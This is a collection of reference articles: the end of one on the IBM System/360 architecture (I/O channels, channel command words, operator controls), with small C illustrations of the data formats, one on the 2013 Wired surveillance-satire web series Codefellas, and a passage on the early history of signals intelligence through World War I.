overflow exceptionPoOps is recognized when significant digits are lost in a decimal arithmetic instruction, other than divide. A decimal divide exceptionPoOps is recognized when significant digits are lost in a decimal divide instruction. The destination is not altered. 
An exponent overflow exceptionPoOps is recognized when the characteristic in a floating-point arithmetic operation exceeds 127 and the fraction is not zero. An exponent underflow exceptionPoOps is recognized when the characteristic in a floating-point arithmetic operation is negative and the fraction is not zero. A significance exceptionPoOps is recognized when the fraction in a floating-point add or subtract operation is zero. A floating-point divide exceptionPoOps is recognized when the fraction in the divisor of a floating-point divide operation is zero. Supervisor Call interruption A Supervisor Call interruptionPoOps occurs as the result of a Supervisor Call instruction; the system stores bits 8-15 of the SVC instruction as the Interruption Code. External interruption An ExternalPoOps interruption occurs as the result of certain asynchronous events. Bits 16-23 of the External Old PSW are set to 0 and one or more of bits 24-31 is set to 1. Machine Check interruption A Machine Check interruptionPoOps occurs to report unusual conditions associated with the channel or CPU that cannot be reported by another class of interruption. The most important class of conditions causing a Machine Check is a hardware error such as a parity error found in registers or storage, but some models may use it to report less serious conditions. Both the interruption code and the data stored in the scanout area at '80'x (128 decimal) are model dependent. Input/Output This article describes I/O from the CPU perspective. It does not discuss the channel cable or connectors, but there is a summary elsewhere and details can be found in the IBM literature. I/O is carried out by a conceptually separate processor called a channel. Channels have their own instruction set, and access memory independently of the program running on the CPU. On the smaller models (through 360/50) a single microcode engine runs both the CPU program and the channel program. On the larger models the channels are in separate cabinets and have their own interfaces to memory. A channel may contain multiple subchannels, each containing the status of an individual channel program. A subchannel associated with multiple devices that cannot concurrently have channel programs is referred to as shared; a subchannel representing a single device is referred to as unshared. There are three types of channels on the S/360: A byte multiplexer channel is capable of executing multiple CCWs concurrently; it is normally used to attach slow devices such as card readers and telecommunications lines. A byte multiplexer channel could also have a number of selector subchannels, each of which behaves like a low-speed selector channel. A selector channel has only a single subchannel, and hence is only capable of executing one channel command at a time. It is normally used to attach fast devices that are not capable of exploiting a block multiplexer channel to suspend the connection, such as magnetic tape drives. A block multiplexer channel is capable of concurrently running multiple channel programs, but only one at a time can be active. The control unit can request suspension at the end of a channel command and can later request resumption. This is intended for devices in which there is a mechanical delay after completion of data transfer, e.g., for seeks on moving-head DASD. The block multiplexer channel was a late addition to the System/360 architecture; early machines had only byte multiplexer channels and selector channels. 
The block multiplexer channel was an optional feature only on the models 85 and 195. The block multiplexer channel was also available on the later System/370 computers. Conceptually peripheral equipment is attached to an S/360 through control units, which in turn are attached through channels. However, the architecture does not require that control units be physically distinct, and in practice they are sometimes integrated with the devices that they control. Similarly, the architecture does not require the channels to be physically distinct from the processor, and the smaller S/360 models (through 360/50) have integrated channels that steal cycles from the processor. Peripheral devices are addressed with 16-bit addresses, referred to as cua or cuu; this article will use the term cuu. The high 8 bits identify a channel, numbered from 0 to 6, while the low 8 bits identify a device on that channel. A device may have multiple cuu addresses. Control units are assigned an address "capture" range. For example, a CU might be assigned range 20-2F or 40-7F. The purpose of this is to assist with the connection and prioritization of multiple control units to a channel. For example, a channel might have three disk control units at 20-2F, 50-5F, and 80-8F. Not all of the captured addresses need to have an assigned physical device. Each control unit is also marked as High or Low priority on the channel. Device selection progresses from the channel to each control unit in the order they are physically attached to their channel. At the end of the chain the selection process continues in reverse back towards the channel. If the selection returns to the channel then no control unit accepted the command and SIO returns Condition Code 3. Control units marked as High Priority check the outbound CUU to be within their range. If so, then the I/O is processed. If not, then the selection is passed to the next outbound CU. Control units marked as Low Priority check for inbound (returning) CUU to be within their range. If so, then the I/O is processed. If not, then the selection is passed to the next inbound CU (or the channel). The connection of three control units to a channel might be physically -A-B-C and, if all are marked as High, then the priority would be ABC. If all are marked Low then the priority would be CBA. If B was marked High and A and C Low then the order would be BCA. Extending this line of reasoning, the first of N controllers would be priority 1 (High) or 2N-1 (Low), the second priority 2 or 2N-2, the third priority 3 or 2N-3, etc. The last physically attached would always be priority N. There are three storage fields reserved for I/O; a doubleword I/O old PSW, a doubleword I/O new PSW and a fullword Channel Address Word (CAW). Performing an I/O normally requires the following steps: initializing the CAW with the storage key and the address of the first CCW; issuing a Start I/O (SIO) instruction that specifies the cuu for the operation; waiting for an I/O interruption; and handling any unusual conditions indicated in the Channel Status Word (CSW). A channel program consists of a sequence of Channel Command Words (CCWs) chained together (see below). Normally the channel fetches CCWs from consecutive doublewords, but a control unit can direct the channel to skip a CCW and a Transfer In Channel (TIC) CCW can direct the channel to start fetching CCWs from a new location. 
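The control blocks involved in starting an I/O operation can be sketched as follows in C (a host-side illustration only, not IBM code). The CAW layout assumed here (4-bit key in bits 0-3, zeros in bits 4-7, CCW address in bits 8-31) and the CCW flag bit positions (CD, CC, SLI, SKIP, PCI) are the conventional S/360 assignments and should be checked against the Principles of Operation.

```c
#include <stdint.h>

#define CCW_CD   0x80   /* chain data                      */
#define CCW_CC   0x40   /* chain command                   */
#define CCW_SLI  0x20   /* suppress length indication      */
#define CCW_SKIP 0x10   /* skip data transfer              */
#define CCW_PCI  0x08   /* program-controlled interruption */

/* Build one doubleword CCW: command code, 24-bit data address,
 * flag byte, a must-be-zero byte, and an unsigned halfword count,
 * all laid out big-endian.                                        */
static void build_ccw(uint8_t ccw[8], uint8_t cmd, uint32_t addr,
                      uint8_t flags, uint16_t count)
{
    ccw[0] = cmd;
    ccw[1] = (addr >> 16) & 0xFF;
    ccw[2] = (addr >>  8) & 0xFF;
    ccw[3] =  addr        & 0xFF;
    ccw[4] = flags;
    ccw[5] = 0;                        /* must be zero              */
    ccw[6] = (count >> 8) & 0xFF;
    ccw[7] =  count       & 0xFF;
}

/* Build the fullword CAW: 4-bit storage key in bits 0-3, zeros in
 * bits 4-7, and the 24-bit address of the first CCW in bits 8-31. */
static uint32_t build_caw(unsigned key, uint32_t first_ccw_addr)
{
    return ((uint32_t)(key & 0xF) << 28) | (first_ccw_addr & 0x00FFFFFF);
}
```

Following the sequence listed above, a driver would store the CAW at its assigned low-storage location, issue SIO with the target cuu, wait for the I/O interruption, and then examine the CSW at location 64.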
There are several defined ways for a channel command to complete. Some of these allow the channel to continue fetching CCWs, while others terminate the channel program. In general, if the CCW does not have the chain-command bit set and is not a TIC, then the channel will terminate the I/O operation and cause an I/O interruption when the command completes. Certain status bits from the control unit suppress chaining. The most common ways for a command to complete are for the count to be exhausted when chain-data is not set and for the control unit to signal that no more data transfers should be made. If Suppress-Length-Indication (SLI) is not set and one of those occurs without the other, chaining is not allowed. The most common situations that suppress chaining are unit-exception and unit-check. However, the combination of unit-check and status-modifier does not suppress chaining; rather, it causes the channel to do a command retry, reprocessing the same CCW. In addition to the interruption signal sent to the CPU when an I/O operation is complete, a channel can also send a Program-Controlled interruption (PCI) to the CPU while the channel program is running, without terminating the operation, and a delayed device-end interruption after the I/O completion interruption. Channel status These conditions are detected by the channel and indicated in the CSW.PoOps Program-controlled interruptionPoOps indicates that the channel has fetched a CCW with the PCI bit set. The channel continues processing; this interruption simply informs the CPU of the channel's progress. An example of the use of Program-controlled interruption is in the "Program Fetch" function of Contents Supervision, whereby the control program is notified that a Control/Relocation Record has been read. To ensure that this record has been completely read into main storage, a "disabled bit spin", one of the few which remains in the control program, is initiated. Satisfaction of the spin indicates that the Control/Relocation Record is completely in main storage and the immediately preceding Text Record may be relocated. After relocation, a NOP CCW is changed to a TIC and the channel program continues. In this way, an entire load module may be read and relocated while utilizing only one EXCP, and possibly only one revolution of the disk drive. PCI also has applications in teleprocessing access method buffer management. Incorrect lengthPoOps indicates that the data transfer for a command completed before the Count was exhausted. This indication is suppressed if the Suppress-Length-Indication bit in the CCW is set. Program checkPoOps indicates one of the following errors: nonzero bits where zeros are required; an invalid data or CCW address; or the CAW or a TIC refers to a TIC. Protection checkPoOps indicates that the protection key in the CAW is non-zero and does not match the storage protection key. Channel data checkPoOps indicates a parity error during a data transfer. Channel control checkPoOps indicates a channel malfunction other than Channel data check or Interface control check. Interface control checkPoOps indicates an invalid signal in the channel to control unit interface. Chaining checkPoOps indicates lost data during data chaining. Unit status These conditions are presented to the channel by the control unit or device.PoOps In some cases they are handled by the channel and in other cases they are indicated in the CSW. There is no distinction between conditions detected by the control unit and conditions detected by the device. 
AttentionPoOps indicates an unusual condition not associated with an ongoing channel program. It often indicates some sort of operator action like requesting input, in which case the CPU would respond by issuing a read-type command, most often a sense command (04h), from which additional information could be deduced. Attention is a special condition that requires specific operating system support, and for which the operating system has a special attention table with a necessarily limited number of entries. Status modifierPoOps (SM) indicates one of three unusual conditions: a Test I/O instruction was issued to a device that does not support it; a Busy status refers to the control unit rather than to the device; or a device has detected a condition that requires skipping a CCW. A CCW with a command for which Status Modifier is possible will normally specify command chaining, in which case the SM is processed by the channel and does not cause an interruption. A typical channel program where SM occurs is ... Search Id Equal; TIC *-8; Read Data ... where the TIC causes the channel to refetch the search until the device indicates a successful search by raising SM. Control unit endPoOps indicates that a previous control unit busy status has been cleared. BusyPoOps indicates that a device (SM=0) or a control unit (SM=1) is busy. Channel endPoOps indicates that the device has completed the data transfer for a channel command. There may also be an Incorrect length indication if the Count field of the CCW is exhausted, depending on the value of the Suppress-Length-Indication bit. Device endPoOps indicates that the device has completed an operation and is ready to accept another. DE may be signalled concurrently with CE or may be delayed. Unit checkPoOps indicates that the device or control unit has detected an unusual condition and that details may be obtained by issuing a Sense command. Unit exceptionPoOps indicates that the device has detected an unusual condition, e.g., end of file. Channel Address Word The fullword Channel Address Word (CAW) contains a 4-bit storage protection key and a 24-bit address of the channel program to be started. Channel Command Word A Channel Command Word is a doubleword containing the following: an 8-bit channel Command CodePoOps, a 24-bit addressPoOps, a 5-bit flag fieldPoOps and an unsigned halfword Count fieldPoOps. CCW Command codes The low order 2 or 4 bits of the command code determine the six types of operations that the channel performs: write, read, read backward, control, sense and transfer in channel (see the decoding sketch below). The meaning of the high order six or four bits, the modifier bits, depends upon the type of I/O device attached, see e.g., DASD CKD CCWs. All eight bits are sent to and interpreted in the associated control unit (or its functional equivalent). Control is used to cause a state change in a device or control unit, often associated with mechanical motion, e.g., rewind, seek. Sense is used to read data describing the status of the device. The most important case is that when a command terminates with unit check, the specific cause can only be determined by doing a Sense and examining the data returned. A Sense command with the modifier bits all zero is always valid. A noteworthy deviation from the architecture is that DASD use Sense command codes for Reserve and Release, instead of using Control. CCW flags The flags in a CCW affect how it executes and terminates. 
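The command-code decoding referred to above can be sketched as follows (C, hypothetical helper). The bit patterns used are the conventional S/360 ones, with Write as xxxxxx01, Read as xxxxxx10, Control as xxxxxx11, Read Backward as xxxx1100, Sense as xxxx0100 and Transfer in Channel as xxxx1000; the original encoding table appears in the Principles of Operation and should be treated as authoritative.

```c
#include <stdint.h>

/* Operation types distinguished by the channel. */
enum ccw_op { CCW_INVALID, CCW_WRITE, CCW_READ, CCW_READ_BACKWARD,
              CCW_CONTROL, CCW_SENSE, CCW_TIC };

/* Decode the operation type from the low-order bits of a CCW command
 * code; the high-order modifier bits are passed to the control unit
 * and are not interpreted here.                                      */
static enum ccw_op ccw_operation(uint8_t cmd)
{
    switch (cmd & 0x0F) {             /* four low-order bits first     */
    case 0x4: return CCW_SENSE;
    case 0x8: return CCW_TIC;
    case 0xC: return CCW_READ_BACKWARD;
    default:  break;
    }
    switch (cmd & 0x03) {             /* otherwise only two bits matter */
    case 0x1: return CCW_WRITE;
    case 0x2: return CCW_READ;
    case 0x3: return CCW_CONTROL;
    default:  return CCW_INVALID;     /* low bits 00: invalid command   */
    }
}
```

Under this decoding, for example, the DASD Seek command (X'07') would be treated as a control operation and Read Data (X'06') as a read.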
Channel Status Word The Channel Status Word (CSW) provides data associated with an I/O interruption. The Protection Key field contains the protect key from the CAW at the time that the I/O operation was initiated for I/O complete or PCI interruptions.PoOps The Command Address field contains the address+8 of the last CCW fetched for an I/O complete or PCI interruption. However, there are 9 exceptionsPoOps. The Status field contains one byte of Channel status bits, indicating conditions detected by the channelPoOps, and one byte of Unit status bits, indicating conditions detected by the I/O unitPoOps. There is no distinction between conditions detected by the control unit and conditions detected by the device. The Residual Count is a halfword that gives the number of bytes in the area described by the CCW that have not been transferred to or from the channelPoOps. The difference between the count in the CCW and the residual count gives the number of bytes transferred. Operator controls The architecture of System/360 specified the existence of several common functions, but did not specify their means of implementation. This allowed IBM to use different physical means, e.g., dial, keyboard, pushbutton, roller, image or text on a CRT, for selecting the functions and values on different processors. Any reference to key or switch should be read as applying to, e.g., a light-pen selection or an equivalent keyboard sequence. System Reset sends a reset signal on every I/O channel and clears the processor state; all pending interruptions are cancelled. System Reset is not guaranteed to correct parity errors in general registers, floating point registers or storage. System Reset does not reset the state of shared I/O devices. Initial Program Load (IPL)PoOps is a process for loading a program when there is no loader available in storage, usually because the machine has just been powered on, or to load an alternative operating system. This process is sometimes known as booting. As part of the IPL facility the operator has a means of specifying a 12-bit device address, typically with three dials. When the operator selects the Load function, the system performs a System Reset, sends a Read IPL channel command to the selected device in order to read 24 bytes into locations 0-23 and causes the channel to begin fetching CCWs at location 8; the effect is as if the channel had fetched a CCW with a length of 24, an address of 0 and flags specifying Command Chaining and Suppress Length Indication. At the completion of the operation, the system stores the I/O address in the halfword at location 2 and loads the PSW from location 0. Initial program loading is typically done from a tape, a card reader, or a disk drive. Generally, the operating system was loaded from a disk drive; IPL from tape or cards was used only for diagnostics or for installing an operating system on a new computer. Emergency pull switchPoOps (Emergency power off, EPO) sends an EPO signal to every I/O channel, then turns off power to the processor complex. Because EPO bypasses the normal sequencing of power down, damage can result, and the EPO control has a mechanical latch to ensure that a customer engineer inspects the equipment before attempting to power it back on. Power onPoOps powers up all components of the processor complex and performs a system reset. Power offPoOps initiates an orderly power-off sequence. Although the contents of storage are preserved, the associated storage keys may be lost. The Interrupt keyPoOps causes an external interruption with bit 25 set in the External Old PSW. 
The Wait lightPoOps indicates that the PSW has bit 14 (wait) set; the processor is temporarily halted but resumes operation when an interruption condition occurs. The Manual lightPoOps indicates that the CPU is in a stopped state. The System lightPoOps indicates that a meter is running, either due to CPU activity or due to I/O channel activity. The Test lightPoOps indicates that certain operator controls are active, that certain facilities, e.g., INSTRUCTION STEP, have been used by a Diagnose instruction, or that abnormal thermal conditions exist. The details are model dependent. The Load lightPoOps is turned on by IPL and external start. It is turned off by loading the PSW from location 0 at the completion of the load process. The Load unitPoOps controls provide the rightmost 11 bits of the device address from which to perform an IPL. The Load KeyPoOps starts the IPL sequence. The Prefix Select Key SwitchPoOps selects whether IPL will use the primary prefix or the alternative prefix. The System-Reset KeyPoOps initiates a System Reset. The Stop KeyPoOps puts the CPU in a stopped state; channel programs continue running and interruption conditions remain pending. The Rate SwitchPoOps determines the mode in which the processor fetches instructions. Two modes are defined by the architecture: PROCESS and INSTRUCTION STEP. The Start KeyPoOps initiates instruction fetching in accordance with the setting of the Rate Switch. The Storage-Select SwitchPoOps determines the type of resource accessed by the Store Key and Display Key. Three selections are defined by the architecture: Main storage, General registers and Floating-point registers. The Address SwitchesPoOps specify the address or register number for the Store Key, Display Key and, on some models, the Set IC Key. The Data SwitchesPoOps specify the data for the Store Key and, on some models, the Set IC Key. The Store KeyPoOps stores the value in the Data Switches as specified by the Storage-Select Switch and the Address Switches. The Display KeyPoOps displays the value specified by the Storage-Select Switch and the Address Switches. The Set IC KeyPoOps sets the instruction address portion of the PSW from the Data Switches or the Address Switches, depending on the model. The Address-Compare SwitchesPoOps select the mode of comparison and what is compared. Stop on instruction address compare is present on all models, but stop on data address compare is only present on some models. The Alternate-Prefix LightPoOps is on when the prefix trigger is in the alternate state. Optional features Byte-aligned operands On some models the alignment requirements for some problem-state instructions were relaxed. There is no mechanism to turn off this feature, and programs depending on receiving a program check type 6 (alignment) on those instructions must be modified. Decimal arithmetic The decimal arithmetic feature provides instructions that operate on packed decimal data. A packed decimal number has 1-31 decimal digits followed by a 4-bit sign. All of the decimal arithmetic instructions except PACK and UNPACK generate a Data exception if a digit is not in the range 0-9 or a sign is not in the range A-F. Direct Control The Direct ControlPoOps feature provides six external signal lines and an 8-bit data path to/from storage. Floating-point arithmetic The floating-point arithmetic feature provides 4 64-bit floating point registers and instructions to operate on 32 and 64 bit hexadecimal floating point numbers. 
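A short C sketch (hypothetical helper, not IBM code) of interpreting the 32-bit hexadecimal floating point format described under Data formats: bit 0 is the sign, bits 1-7 the characteristic (a power of 16 biased by 64) and bits 8-31 a six-hex-digit fraction with the radix point to its left.

```c
#include <stdint.h>
#include <math.h>

/* Convert a 32-bit S/360 short hexadecimal floating point word to a
 * C double: value = (+/-) fraction * 16^(characteristic - 64), where
 * the 24-bit fraction is scaled to lie in [0, 1).                    */
static double hfp_short_to_double(uint32_t word)
{
    int sign           = (word >> 31) & 0x1;
    int characteristic = (word >> 24) & 0x7F;
    uint32_t fraction  = word & 0x00FFFFFF;

    /* fraction * 2^-24 places the radix point before the six hex digits. */
    double value = ldexp((double)fraction, -24) * pow(16.0, characteristic - 64);
    return sign ? -value : value;
}
```

For example, X'41100000' decodes to 1.0 and X'C1200000' to -2.0. Unlike IEEE 754, there is no hidden bit and the exponent scales by powers of 16 rather than 2, which is why the format is called hexadecimal floating point.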
The 360/85 and 360/195 also support 128 bit extended precision floating point numbers. Interval timer If the interval timer feature is installed, the processor decrements the word at location 80 ('50'X) at regular intervals; the architecture does not specify the interval but does require that the value subtracted make it appear as though 1 were subtracted from bit 23 of the word 300 times per second. The smaller models decremented at the same frequency (50 Hz or 60 Hz) as the AC power supply, but larger models had a high resolution timer feature. The processor causes an External interruption when the timer goes to zero. Multi-system operation Multi-system operationPoOps is a set of features to support multi-processor systems, e.g., Direct Control, direct address relocation (prefixing). Storage protection If the storage protection feature is installed, then there is a 4-bit storage key associated with every 2,048-byte block of storage and that key is checked when storing into any address in that block by either a CPU or an I/O channel. A CPU or channel key of 0 disables the check; a nonzero CPU or channel key allows data to be stored only in a block with the matching key. Storage Protection was used to prevent a defective application from writing over storage belonging to the operating system or another application. This permitted testing to be performed along with production. Because the key was only four bits in length, the maximum number of different applications that could be run simultaneously was 15. An additional option available on some models was fetch protection. It allowed the operating system to specify that blocks were protected from fetching as well as from storing. Deviations and extensions The System/360 Model 20 is radically different and should not be considered to be an S/360. The System/360 Model 44 is missing certain instructions, but a feature allowed the missing instructions to be simulated in hidden memory, thus allowing the use of standard S/360 operating systems and applications. Some models have features that extend the architecture, e.g., emulation instructions and paging, and some models make minor deviations from the architecture. Examples include: The multisystem feature on the S/360-65, which modifies the behavior of the direct control feature and of the Set System Mask (SSM) instruction. The System/360 Model 67-2 had similar, but incompatible, changes. Some deviations served as prototypes for features of the S/370 architecture. See also Memory protection key Notes References Further reading Chapter 3 (pp. 41–110) describes the System/360 architecture. External links Introduction to IBM System/360 Architecture (Student Text) Computer architecture Computing platforms architecture Instruction set architectures Computer-related introductions in 1964
39756995
https://en.wikipedia.org/wiki/Codefellas
Codefellas
Codefellas is an American animated political satire web series starring Emily Heller and John Hodgman distributed by Wired magazine. It was created by David Rees and Brian Spinks from an idea by Robert Green. Background On June 6, 2013, former NSA contractor Edward Snowden leaked the existence of PRISM, an electronic surveillance program intended to monitor e-mail and phone call activity in the United States to identify possible terrorist threats, to the newspapers The Guardian and The Washington Post. Condé Nast Publications, who produces Wired magazine, said Codefellas would provide "comedic relief in light of current events dominating the national news cycle." After Wired joined Condé Nast's Digital Video Network, five original web series were announced for Wireds video channel including Codefellas and Mister Know-It-All. Codefellas is Wired's first scripted series. Production Codefellas was scripted by Get Your War On cartoonist David Rees and Brian Spinks, who produced Get Your War On for The Huffington Post. Flat Black Films, the animation and software company who worked on the Richard Linklater films Waking Life and A Scanner Darkly, worked on the rotoscoping and lipsyncing. Twelve episodes of Codefellas were planned and produced. The first episode, "When Topple Met Winters", premiered on June 21, 2013. The second episode, "Meet Big Data", premiered on June 26, 2013. The third episode, "How to Hack a Website", premiered on July 10, 2013. The fourth episode, "The AntiSocial Network", premiered on July 17, 2013. The fifth episode, "Spy vs. Spy", premiered on July 24, 2013. The sixth episode, "Blackmail at 4:20", premiered on July 31, 2013. The seventh episode, "25 Reasons the NSA Should Hire Buzzfeed Staffers", premiered on August 14, 2013. The eighth episode, "How to Kill Your Boss", premiered on August 21, 2013. The ninth episode, "How to Hack a Telegram", premiered on August 28, 2013. The tenth episode, "How to Cheat to Win", premiered on September 4, 2013. The eleventh episode, "Shout to All My Lost Spies", premiered on September 11, 2013. The twelfth episode, "The Cougar Lies with Spanish Moss", premiered on September 18, 2013. Story In the first episode, "When Topple Met Winters", protégé hacker Nicole Winters (Emily Heller) who works for "Special Projects", an electronic surveillance governmental agency, receives a call from elderly Special Agent Henry Topple (John Hodgman) informing her that she has just been assigned to him to spy on the general public. In the second episode, "Meet Big Data", Agent Topple checks up on how Winters is settling into her new job at "Special Projects". Topple asks Winters about her surveillance of e-mails and in turn reveals his lack of understanding with modern computing. The conversation then trails off into the secret history of how fake mustaches were involved with the United States' national security. In the third episode, "How to Hack a Website", Agent Topple instructs Winters to hack a website. It is revealed that Topple merely used Winters's hacking expertise to remember the password to his old GeoCities e-mail. After Topple asks what e-mails are in his inbox, Winters finds an urgent message from 1998 on a secret project involving Topple's past partner Logan and a "test subject". In the fourth episode, "The AntiSocial Network", Agent Topple calls Winters about a supposed alert from PRISM on a cyberterrorist group called "Evite" infiltrating their networks and a subsequent attack. 
In the course of conversation, it is revealed that it is only an invitation from Topple's co-worker Doug for his retirement party, described as a "big blow-out." Blaming the terror alert from PRISM on boredom, Winters brings up Facebook, a social network. Topple then calls Facebook "the smartest way to keep people dumb since we started fluoridating the water." Winters then admonishes Topple for making her fill out an "88-J" incident form because he revealed classified information so candidly. Since "88-J" incident forms are only filled out by supervisors, Topple realizes Winters was promoted to become his superior. In the fifth episode, "Spy vs. Spy", Winters calls Topple back since she was busy with a briefing. As Topple was not invited to the meeting, he passed the time watching telenovelas. Winters complains about his unprofessionalism and reveals that she had not slept well because of a list of troubles the night before. It turns out that the troubles were all perpetrated by Topple, using the national security apparatus at his disposal, as he is still upset over Winters's recent promotion. In the sixth episode, "Blackmail at 4:20", Topple finds his personal accounts with Walgreens, Amtrak, MCI, and so forth have been hacked because of Winters. In retaliation, Topple orders a "toilet water sample" and finds that Winters is a drug user, which is grounds for termination. Coming to a compromise, Winters discloses to Topple her secret project: stopping a North Korean computer virus. Per their agreement, Topple gets to collaborate with Winters on the secret project as well as get full credit for it. In the seventh episode, "25 Reasons the NSA Should Hire Buzzfeed Staffers", Topple sends Winters a fax of his analysis of the North Korean computer virus called "Staxnut". As the two converse on the computer virus, it is revealed that the computer virus could replace all American digital content with North Korean flag dancing. Given that North Korea is busy producing flags, there is still time to stop the virus. However, Topple realizes it would wipe out electronic dance music (and other media) he loathes, and thus faces a dilemma. In the eighth episode, "How to Kill Your Boss", Winters informs Topple that she called Chief Deputy Rollins and that Rollins does not want Topple on the Staxnut project. Annoyed that he is not involved with the project, Topple lists off the people he has killed. In the course of the conversation, Winters receives an alert that the Chief Deputy was murdered. Reception Commercial As of June 26, 2013, Codefellas' first episode "When Topple Met Winters" had garnered "more than 266,000 views." Critical reception Cory Doctorow of Boing Boing called Codefellas "pretty promising stuff!" Eike Kühl of Die Zeit said the first two episodes "shine primarily by the bizarre dialogues of unequal protagonists." Kate Hutchinson and Gwilym Mumford of The Guardian called Codefellas "very odd", saying "it acts well as an accompaniment to the more hyperactive comedy of Archer." Charlie Anders of io9 called Codefellas "ridiculously funny." E. D. W. Lynch of Laughing Squid called Codefellas "hilarious." Sherwin Siy, VP of legal affairs for consumer advocacy group Public Knowledge, took issue with the premise, saying "It'd be a shame if people started to view pervasive government surveillance as another laughable daily chore, like traffic or boring meetings. On the other hand, it's entirely possible for good comedy to poke at and explore sensitive and enraging issues." 
David Haglund of Slate said "I'm looking forward to the rest." Bradford Evans of Splitsider called Codefellas "a fast, funny comedy that does for domestic spying what Archer does for international espionage." Sam Gutelle of Tubefilter praised Codefellas as "somewhere between Doonesbury and Archer" and said that it "has a chance to become the first smash hit across Conde Nast's network of YouTube channels." See also Get Your War On List of rotoscoped works List of Web television series NSA in popular culture References External links Official site 2013 American television series debuts 2013 web series debuts American comedy web series Political web series American political satire Political satirical television series American satirical television shows Wired (magazine) 2010s YouTube series Works about the National Security Agency 2013 American television series endings
13813961
https://en.wikipedia.org/wiki/Signals%20intelligence%20in%20modern%20history
Signals intelligence in modern history
Before the development of radar and other electronics techniques, signals intelligence (SIGINT) and communications intelligence (COMINT) were essentially synonymous. Sir Francis Walsingham ran a postal interception bureau with some cryptanalytic capability during the reign of Elizabeth I, but the technology was only slightly less advanced than that of the men with shotguns who, during World War I, jammed pigeon post communications and intercepted the messages carried. Flag signals were sometimes intercepted, and efforts were made to impede them. The mid-19th-century rise of the telegraph allowed more scope for interception and spoofing of signals, as shown at Chancellorsville. Signals intelligence became far more central to military (and to some extent diplomatic) intelligence generally with the mechanization of armies, the development of blitzkrieg tactics, the use of submarines and commerce raiders, and the development of practicable radio communications. Even measurement and signature intelligence (MASINT) preceded electronic intelligence (ELINT), with sound ranging techniques for artillery location. SIGINT is the analysis of intentional signals for both communications and non-communications (e.g., radar) systems, while MASINT is the analysis of unintentional information, including, but not limited to, the electromagnetic signals that are the main interest in SIGINT. Origins Electronic interception appeared as early as 1900, during the Boer Wars. The Royal Navy had installed wireless sets produced by Marconi on board their ships in the late 1890s and some limited wireless signalling was used by the British Army. Some wireless sets were captured by the Boers, and were used to make vital transmissions. Since the British were the only people transmitting at the time, no special interpretation of the signals was necessary. The Imperial Russian Navy also experimented with wireless communications under the guidance of Alexander Popov, who first installed a wireless set on a grounded battleship in 1900. The birth of signals intelligence in a modern sense dates to the Russo-Japanese War. As the Russian fleet prepared for conflict with Japan in 1904, the British ship HMS Diana, stationed in the Suez Canal, was able to intercept Russian naval wireless signals being sent out for the mobilization of the fleet, for the first time in history. "An intelligence report on signals intercepted by HMS Diana at Suez shows that the rate of working was extremely slow by British standards, while the Royal Navy interpreters were particularly critical of the poor standard of grammar and spelling among the Russian operators". The Japanese also developed a wireless interception capability and succeeded in listening in to the then primitive Russian communications. Their successes emphasized the importance of this new source of military intelligence, and facilities for the exploitation of this information resource were established by all the major powers in the following years. The Austro-Hungarian Evidenzbureau was able to comprehensively monitor the progress of the Italian army during the Italo-Turkish War of 1911 by monitoring the signals that were sent by a series of relay stations from Tripoli to Rome. In France, the Deuxième Bureau of the Military General Staff was tasked with radio interception. World War I It was over the course of the War that the new method of intelligence collection - signals intelligence - reached maturity. 
The British in particular built up great expertise in the newly emerging field of signals intelligence and codebreaking. Failure to properly protect its communications fatally compromised the Russian Army in its advance early in World War I and led to its disastrous defeat by the Germans under Ludendorff and Hindenburg at the Battle of Tannenberg. France had significant signals intelligence in World War I. Commandant Cartier developed a system of wireless masts, including one on the Eiffel Tower, to intercept German communications. The first such station was built as early as 1908, although it was destroyed by flooding a few years afterward. In the early stages of the war, French intercepts were invaluable for military planning and provided the crucial intelligence to commander-in-chief Joseph Joffre that enabled him to carry out the successful counterattack against the Germans at the Marne in September 1914. In 1918, French intercept personnel captured a message written in the new ADFGVX cipher, which was cryptanalyzed by Georges Painvin. This gave the Allies advance warning of the German 1918 Spring Offensive. US communications monitoring of naval signals started in 1918, but was used first as an aid to naval and merchant navigation. In October 1918, just before the end of the war, the US Navy set up its first DF installation at its station at Bar Harbor, Maine, soon joined by five other Atlantic coast stations, and then a second group of 14 installations. These stations, after the end of World War I, were not used immediately for intelligence. While there were 52 Navy medium wave (MF) DF stations in 1924, most of them had deteriorated. Cracking the German naval codes By the start of the First World War, a worldwide commercial undersea communication cable network had been built up over the previous half-century, allowing nations to transmit information and instructions around the world. Techniques for intercepting these messages through ground returns were developed, so all cables running through hostile territory could in theory be intercepted. On the declaration of war, one of Britain's first acts was to cut all German undersea cables. On the night of 3 August 1914, the cable ship Alert located and cut Germany's five trans-Atlantic cables, which ran down the English Channel. Soon after, the six cables running between Britain and Germany were cut. This forced the Germans to use either a telegraph line that connected through the British network and could be tapped, or radio, which the British could then intercept. The destruction of more secure wired communications, to improve the intelligence take, has been a regular practice since then. While one side may be able to jam the other's radio communications, the intelligence value of poorly secured radio may be so high that there is a deliberate decision not to interfere with enemy transmissions. Although Britain could now intercept German communications, codes and ciphers were used to hide the meaning of the messages. Neither Britain nor Germany had any established organisations to decode and interpret the messages at the start of the war - the Royal Navy had only one wireless station for intercepting messages, at Stockton-on-Tees. However, installations belonging to the Post Office and the Marconi Company, as well as private individuals who had access to radio equipment, began recording messages from Germany. 
Realizing that the strange signals they were receiving were German naval communications, they brought them to the Admiralty. Rear-Admiral Henry Oliver appointed Sir Alfred Ewing to establish an interception and decryption service. Among its early recruits were Alastair Denniston, Frank Adcock, John Beazley, Francis Birch, Walter Horace Bruford, William Nobby Clarke, Frank Cyril Tiarks and Dilly Knox. In early November 1914 Captain William Hall was appointed as the new Director of the Intelligence division to replace Oliver. A similar organisation had begun in the Military Intelligence department of the War Office, which became known as MI1b, and Colonel Macdonagh proposed that the two organisations should work together. Little success was achieved except to organise a system for collecting and filing messages until the French obtained copies of German military ciphers. The two organisations operated in parallel, decoding messages concerning the Western Front. A friend of Ewing's, a barrister by the name of Russell Clarke, plus a friend of his, Colonel Hippisley, approached Ewing to explain that they had been intercepting German messages. Ewing arranged for them to operate from the coastguard station at Hunstanton in Norfolk. They formed the core of the interception service known as the 'Y' service, together with the post office and Marconi stations, which grew rapidly to the point that it could intercept almost all official German messages. In a stroke of luck, the SKM codebook was obtained from the German light cruiser Magdeburg, which ran aground on the island of Odensholm off the coast of Russian-controlled Estonia. The books were formally handed over to the First Lord, Winston Churchill, on 13 October. The SKM by itself was incomplete as a means of decoding messages since they were normally enciphered as well as coded, and those that could be understood were mostly weather reports. An entry into solving the problem was found from a series of messages transmitted from the German Norddeich transmitter, which were all numbered sequentially and then re-enciphered. The cipher was broken, in fact broken twice as it was changed a few days after 